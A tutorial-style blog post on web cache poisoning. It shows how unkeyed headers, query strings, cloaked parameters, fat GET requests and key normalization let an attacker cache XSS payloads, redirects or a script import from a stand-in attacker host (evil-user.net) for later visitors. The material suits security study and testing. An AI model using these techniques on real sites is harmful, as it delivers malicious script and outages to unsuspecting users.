Cache Corruption: Unveiling the Web Cache Poisoning Exploit

A Hacker's Insight into Manipulating Caches for Exploits and Attacks

·

16 min read

Cache Corruption: Unveiling the Web Cache Poisoning Exploit

Web Caches 101

a web cache is a system that temporarily stores web documents such as HTML pages, images, and media files to reduce bandwidth usage, server load, and latency. It serves copies of requested content directly to users, avoiding the need to fetch it from the original server. Web caches are implemented at various levels, including browser caches, proxy caches, and content delivery networks (CDNs), and they play a crucial role in improving the efficiency and speed of web browsing.

How Web Cache Work

The Cache sits between the server and the user. It saves (Caches) the responses to particular requests for fixed amount of time. If another user the sends an equivalent request the cache simply serves a copy of the cached response directly to the user, without any interaction from the back-end.

What is cache key

When a web cache receives an HTTP request, it assesses whether there is a cached response it can directly serve or if it needs to forward the request to the back-end server. The cache identifies equivalent requests by comparing a predefined subset of components, collectively known as the "cache key," typically including the request line and Host header. Components not included in the cache key are deemed "unkeyed.”

If the cache key of an incoming request matches that of a previous request, the cache treats them as equivalent. Consequently, it serves a copy of the cached response generated for the original request. This behavior persists for all subsequent requests with the matching cache key until the cached response expires.

This means that caches think the following two requests are equivalent, and will happily respond to the second request with a response cached from the first:

GET /blog/post.php?mobile=1 HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 … Firefox/57.0
Cookie: language=pl;
Connection: close
GET /blog/post.php?mobile=1 HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 … Firefox/57.0
Cookie: language=en;
Connection: close

As a result, the page will be served in the wrong language to the second visitor.

Web Cache Poisoning In Steps

Web Cache Poisoning is an attack accurs when an attacker manipulates the contents of a web cache to serve malicious content to users. Web caches are intermediate servers or components that store copies of web pages and assets to improve the speed and efficiency of web browsing. They are commonly used in proxy servers, Content Delivery Networks (CDNs), and web application accelerators.

Here's a simplified explanation of how it works:

  1. Caching Mechanism: When a user requests a web page, the server may store a copy of that page in a cache to serve it faster in the future. The cached copy is associated with a specific URL.

  2. Attack Vector: An attacker manipulates the input parameters, headers, or other aspects of the requested URL in a way that causes the cache to store a malicious version of the page. This can be achieved through various techniques such as injecting malicious parameters, manipulating headers, or exploiting vulnerabilities in the web application.

  3. Serving Poisoned Content: When subsequent users request the same URL, the cache retrieves the poisoned version of the page and serves it to unsuspecting users. This could lead to a range of malicious activities, including spreading malware, stealing sensitive information, or performing other attacks.

Constructing a web cache poisoning attack

Constructing a basic web cache poisoning attack involves the following steps:

  1. Identify and evaluate unkeyed inputs

  2. Elicit a harmful response from the back-end server

  3. Get the response cached

Identify and evaluate unkeyed inputs

Web cache poisoning attacks exploit the manipulation of unkeyed inputs, such as headers

  • Using Param Miner

    Run guess headers from Param Miner

    If a request containing one of its injected inputs has an effect on the response, Param Miner logs this in Burp, either in the "Issues" pane, or in the "Output" tab of the extension

    For example, in the following screenshot, Param Miner found an unkeyed header X-Forwarded-Host on the home page of the website:

Elicit a harmful response from the back-end server

After identifying an unkeyed input, the subsequent step involves assessing how the website processes this input. Gaining a comprehensive understanding of this processing is crucial for triggering a harmful response successfully. If the input is reflected in the server's response without adequate sanitization or is utilized to dynamically generate additional data, it becomes a potential vulnerability for web cache poisoning.

Get the response cached

Various factors, including file extension, content type, route, status code, and response headers, influence whether a response is cached. Experimentation with different requests on various pages is often necessary to understand the cache behavior.

Once the method to cache a response containing the malicious input is determined, you are prepared to deploy the exploit to potential victims in a web cache poisoning attack.

Exploiting cache design flaws

Websites are vulnerable to web cache poisoning if they handle unkeyed input in an unsafe way and allow the subsequent HTTP responses to be cached. This vulnerability can be used as a delivery method for a variety of different attacks.

XSS Via Web Cache Poisoning

If you have unkeyed input is reflected in a cacheable response without sanitization this could be easy to exploit

For example this is the request and the response of the website

GET /en?region=uk HTTP/1.1
Host: innocent-website.com
X-Forwarded-Host: innocent-website.co.uk
HTTP/1.1 200 OK
Cache-Control: public
<meta property="og:image" content="<https://innocent-website.co.uk/cms/social.png>" />

We can see that the value of the X-Forwarded-Host is used to generate an Open Graph image URL and then it's reflected in the response

XSS Exploitation :

X-Forwarded-Host: a."><script>alert(1)</script>"
HTTP/1.1 200 OK
Cache-Control: public
<meta property="og:image" content="<https://a>."><script>alert(1)</script>"/cms/social.png" />

Now all users who access /en?region=uk would be served this XSS Payload

Exploiting unsafe handling of resource imports

Certain websites utilize unkeyed headers to dynamically create URLs for importing external resources, such as JavaScript files hosted externally.

If the response, which includes this manipulated URL, is cached, the attacker's JavaScript file has the potential to be imported and executed in the browser session of any user whose request aligns with the matching cache key.

GET / HTTP/1.1
Host: innocent-website.com
X-Forwarded-Host: evil-user.net
User-Agent: Mozilla/5.0 Firefox/57.0
HTTP/1.1 200 OK
<script src="<https://evil-user.net/static/analytics.js>"></script>`

Exploit Web Cache Poisoning using multiple headers

Some websites demand more sophisticated attacks and only become vulnerable when an attacker can craft a request that manipulates multiple unkeyed inputs.

For instance, consider a website that mandates secure communication via HTTPS. To enforce this, if a request employing a different protocol is received, the website dynamically generates a redirect to itself using HTTPS:

Original Request:

GET /random HTTP/1.1
Host: evil-site.com
X-Forwarded-Proto: http

Server Response:

HTTP/1.1 301 Moved Permanently
Location: <https://evil-site.com/random>

This exploit this behavior to generate a cacheable response that redirects users to a malicious URL.

Information exposure in the responses

Sometimes websites make themselves more vulnerable to web cache poisoning by giving away too much information about themselves and their behavior.

Cache-control directives

Sometimes, responses explicitly disclose information essential for a successful cache poisoning attack.

For instance, certain responses reveal details such as the frequency of cache purges or the age of the currently cached response:

HTTP/1.1 200 OK
Via: 1.1 varnish-v4
Age: 174
Cache-Control: public, max-age=1800

Understanding such information can aid attackers in refining their approach, potentially leading to more effective cache poisoning.

Vary Header

When a cache receives a request that can be satisfied by a cached response that has a Vary header field, it must not use that cached response unless all header fields as nominated by the Vary header match in both the original (cached) request and the new request.

GET /random HTTP/1.1
Host: evil-site.com
User-Agent: fakebrowser
HTTP/1.1 200 OK
vary: User-Agent
X-Cache: hit
<script src="<https://evil-user.net/static/analytics.js>"></script>`

For this cached response the vary header contain the User-Agent make it a part of the cache key so the users using fakebrowser will get this cached response when they access the same end point

Exploiting cache implementation flaws

You can access a much greater attack surface for web cache poisoning by exploiting quirks in specific implementations of caching systems.

Cache Key Flaws

Websites take most of their input from the URL path and the query string. As a result, this is a well-trodden attack surface for various hacking techniques.

In practice, many websites and CDNs perform various transformations on keyed components when they are saved in the cache key. This can include:

  • Excluding the query string

  • Filtering out specific query parameters

  • Normalizing input n keyed components

These transformations might lead to some unexpected quirks, mainly due to differences between the data written to the cache key and the data passed into the application code, despite originating from the same input. These flaws in cache key generation could be exploited to poison the cache via inputs that may initially appear unusable.

Cache probing methodology

Probing for cache implementation flaws requires a different approach than traditional web cache poisoning. These modern techniques focus on pinpointing weaknesses in the cache's unique implementation and setup, which can differ greatly between websites. Therefore, a thorough understanding of the target cache and its operations is crucial.

The methodology consists of the following steps:

  1. Locate a suitable cache oracle

  2. Investigate key handling

  3. Identify a vulnerable gadget

Identify a suitable cache oracle

A cache oracle is simply a page or endpoint that provides feedback about the cache's behavior.

It should be cacheable and clearly indicate whether you received a cached response or a direct one from the server. This indication can be communicated through:

  • An HTTP header explicitly indicating a cache hit.

  • Observable alterations in dynamic content.

  • Noticeable differences in response times.

If a specific third-party cache is detected, consulting its documentation can yield valuable insights. Documentation might outline default cache key construction details. Some caches even provide features for directly viewing the cache key.

For instance, Akamai-based websites might support the header "Pragma: akamai-x-get-cache-key," allowing users to display the cache key in the response headers.

GET /?param=1 HTTP/1.1
Host: innocent-website.com
Pragma: akamai-x-get-cache-key

HTTP/1.1 200 OK
X-Cache-Key: innocent-website.com/?param=1

Probe key handling

The next step is to check if the cache perform any processing of the input when generating the cache key

Focus on examining any transformations occurring during the cache key generation. Identify if there are exclusions from keyed components, such as specific query parameters or the entire query string. Additionally, observe whether the cache removes the port from the Host header as part of the transformation.

Identify an exploitable gadget

These gadgets often relate to common client-side vulnerabilities such as reflected XSS and open redirects. When combined with web cache poisoning, the severity of these attacks increases significantly, turning a reflected vulnerability into a stored one. This removes the necessity to convince a victim to access a specifically crafted URL, as the payload is automatically delivered to anyone visiting the regular, legitimate URL.

Exploiting cache key flaws

let's take a look at some typical cache key flaws and how you might exploit them.

  • Unkeyed port

  • Unkeyed query string

  • Unkeyed query parameters

  • Cache parameter cloaking

  • Normalized cache keys

  • Cache key injection

  • Internal cache poisoning

Unkeyed Port

The Host header, usually included in the cache key, might not seem like an obvious target for payload injection at first. However, some caching systems parse this header and exclude the port from the cache key. Exploiting this behavior can result in web cache poisoning.

For example, if a redirect URL is generated dynamically based on the Host header, adding an arbitrary port could trigger a denial-of-service attack. This action would redirect all users visiting the home page to a nonfunctional port, leading to downtime until the cache expires.

Let's say that our hypothetical cache oracle is the target website's home page. This automatically redirects users to a region-specific page. It uses the Host header to dynamically generate the Location header in the response:

GET / HTTP/1.1
Host: vulnerable-website.com

HTTP/1.1 302 Moved Permanently
Location: <https://vulnerable-website.com/en>
Cache-Status: miss

To test whether the port is excluded from the cache key, we first need to request an arbitrary port and make sure that we receive a fresh response from the server that reflects this input:

GET / HTTP/1.1
Host: vulnerable-website.com:1337

HTTP/1.1 302 Moved Permanently
Location: <https://vulnerable-website.com:1337/en>
Cache-Status: miss

Next, we'll send another request, but this time we won't specify a port:

GET / HTTP/1.1
Host: vulnerable-website.com

HTTP/1.1 302 Moved Permanently
Location: <https://vulnerable-website.com:1337/en>
Cache-Status: hit

Unkeyed query string

Like the Host header, the request line is typically keyed. However, one of the most common cache-key transformations is to exclude the entire query string.

Detecting an unkeyed query string

To identify a dynamic page, you would normally observe how changing a parameter value has an effect on the response. But if the query string is unkeyed, most of the time you would still get a cache hit, and therefore an unchanged response, regardless of any parameters you add. Consequently, traditional cache-buster query parameters become ineffective.

Fortunately, there are alternative ways of adding a cache buster, such as adding it to a keyed header that doesn't interfere with the application's behavior. Some typical examples include:

Accept-Encoding: gzip, deflate, cachebuster
Accept: */*, text/cachebuster Cookie: cachebuster=1
Origin: <https://cachebuster.vulnerable-website.com>
  • Param Miner

    If you use Param Miner, you can also select the options "Add static/dynamic cache buster" and "Include cache busters in headers". It will then automatically add a cache buster to commonly keyed headers in any requests that you send using Burp's manual testing tools.

Exploiting an unkeyed query string

let's assume that the caching system only considers the path and host in generating the cache key, excluding the query string. If this request results in a cache hit, subsequent requests with different values for param1 and param2 would still retrieve the cached response

GET /example/page?param1=value1&param2=value2 HTTP/1.1
Host: example.com

Suppose the parameter param1 in the query string is vulnerable to XSS:

Request:

GET /example/page?param1=<script>alert("XSS");</script>&param2=value2 HTTP/1.1
Host: example.com

If the caching system doesn't consider the query string parameters when generating the cache key, it might cache the response containing the injected script:

HTTP/1.1 200 OK
Content-Type: text/html
Cache-Control: max-age=3600
...
<body>
  <!-- Cached response with XSS payload -->
  <script>alert("XSS");</script>
</body>

Subsequent visitors accessing the same page with the cached response would unknowingly execute the injected script, leading to a successful XSS attack.

Unkeyed query parameters

Websites typically exclude specific query parameters that aren't pertinent to the back-end application, such as those for analytics or targeted advertisements. Parameters like UTM parameters, such as utm_content, are worth checking during testing.

Excluded parameters from the cache key usually have minimal impact on the response. It's unlikely there will be useful gadgets that accept input from these parameters. However, in some cases, pages handle the entire URL vulnerably, allowing for potential exploitation of arbitrary parameters.

Cache parameter cloaking

Excluding a harmless parameter from the cache key and finding no exploitable gadgets based on the full URL may seem like a dead end, but it's where the situation can become interesting.

Understanding how the cache parses URLs to identify and remove unwanted parameters can reveal interesting quirks, especially discrepancies between cache and application parsing. Exploiting these differences can potentially allow arbitrary parameters to bypass cache exclusion by "cloaking" them within excluded parameters.

For instance, according to the de facto standard, a parameter in a URL is typically preceded by a question mark (?) if it's the first one in the query string, or by an ampersand (&) otherwise. However, poorly written parsing algorithms may incorrectly treat any occurrence of ? as the start of a new parameter, irrespective of its position in the query string.

Assuming the cache's exclusion algorithm incorrectly treats any occurrence of ? as a parameter delimiter, while the server's algorithm only recognizes the first ?, consider the following request:

GET /?example=123?excluded_param=bad-stuff-here

In this scenario, the cache would identify two parameters and exclude the second one from the cache key. However, the server only interprets one parameter, example, whose value encompasses the entire rest of the query string, including our payload. If the value of example is passed into a useful gadget, our payload is successfully injected without impacting the cache key.

Exploiting parameter parsing quirks

Let’s say that when we access the home page of an application it make this request :

GET /js/geolocate.js?callback=setCountryCookie

and this is the response :

HTTP/2 200 OK
Cache-Control: max-age=35
Age: 0
X-Cache: miss
...
setCountryCookie({"country":"United Kingdom"});

If we change the value of the callback parametar it change the name of the function in the response

GET /js/geolocate.js?callback=hacker
----------
HTTP/2 200 OK
...
hacker({"country":"United Kingdom"});

we can use the parameter to execute javascript code but we can’t poison the cache for other users because the parameter is keyed.

If we duplicate the callback parameter only the final one is reflected in the response

GET /js/geolocate.js?callback=setCountryCookie&callback=hacker
----------
HTTP/2 200 OK
...
hacker({"country":"United Kingdom"});

The both parameters are still keyed means that we still can’t poison the cache for other users we need a way that make us able to pass two parameters but only the first parameter is keyed.

Let’s say that we identify the parameter utm_content is supported but also it is excluded from the cache key.

If you append the second callback parameter to the utm_content parameter using a semicolon, it is excluded from the cache key and still overwrites the callback function in the response:

GET /js/geolocate.js?callback=setCountryCookie&utm_content=anything;callback=alert(1)

HTTP/1.1 200 OK
X-Cache-Key: /js/geolocate.js?callback=setCountryCookie
…
alert(1)({"country" : "United Kingdom"})

Now as the first callback only is keyed and the the second one is not keyed means that when any one make a request to the endpoint GET /js/geolocate.js?callback=setCountryCookie he will get our poisoned cached response

This works because some frameworks like Ruby on Rails sees the semicolon and splits the query string into three separate parameters:

  1. callback=setCountryCookie

  2. utm_content=anything

  3. callback=alert(1)

In this scenario, the presence of a duplicate callback parameter is significant. Ruby on Rails prioritizes the final occurrence when there are duplicate parameters with different values. Consequently, the cache key retains the innocent, expected parameter value, ensuring normal cached responses for other users. However, on the backend, the same parameter holds a distinct value, which is our injected payload. This secondary value gets passed into the gadget and is reflected in the poisoned response.

Exploiting fat GET support

In certain instances, the HTTP method may not be factored into the cache key. This could enable cache poisoning via a POST request containing a malicious payload in the body, which would then be served in response to users' GET requests. Although rare, a similar effect can sometimes be achieved by augmenting a GET request with a body to create a "fat" GET request:

GET /?param=innocent HTTP/1.1
…
param=bad-stuff-here

Here, the cache key would be derived from the request line, while the server-side value of the parameter would be extracted from the body.

This scenario is feasible only if a website accepts GET requests with a body, although there are potential workarounds. Encouraging "fat GET" handling can sometimes be achieved by overriding the HTTP method. For instance:

GET /?param=innocent HTTP/1.1
Host: innocent-website.com
X-HTTP-Method-Override: POST
…
param=bad-stuff-here

If the X-HTTP-Method-Override header is unkeyed, you could submit a pseudo-POST request while maintaining a GET cache key derived from the request line.

Normalized cache keys

Cache key normalization can introduce exploitable behavior, enabling exploits that would otherwise be difficult to achieve.

For instance, when finding reflected XSS in a parameter, it's often impractical to exploit because modern browsers URL-encode necessary characters, and the server doesn't decode them. However, some caching implementations normalize keyed input when adding it to the cache key. This means that both of the following requests would have the same cache key:

GET /example?param="><test>
GET /example?param=%22%3e%3ctest%3e

Exploiting this behavior allows you to poison the cache with an unencoded XSS payload using tools like Burp Repeater. When the victim visits the malicious URL, the payload remains URL-encoded by their browser. However, once normalized by the cache, it shares the same cache key as the response containing the unencoded payload. Consequently, the cache serves the poisoned response, executing the payload client-side.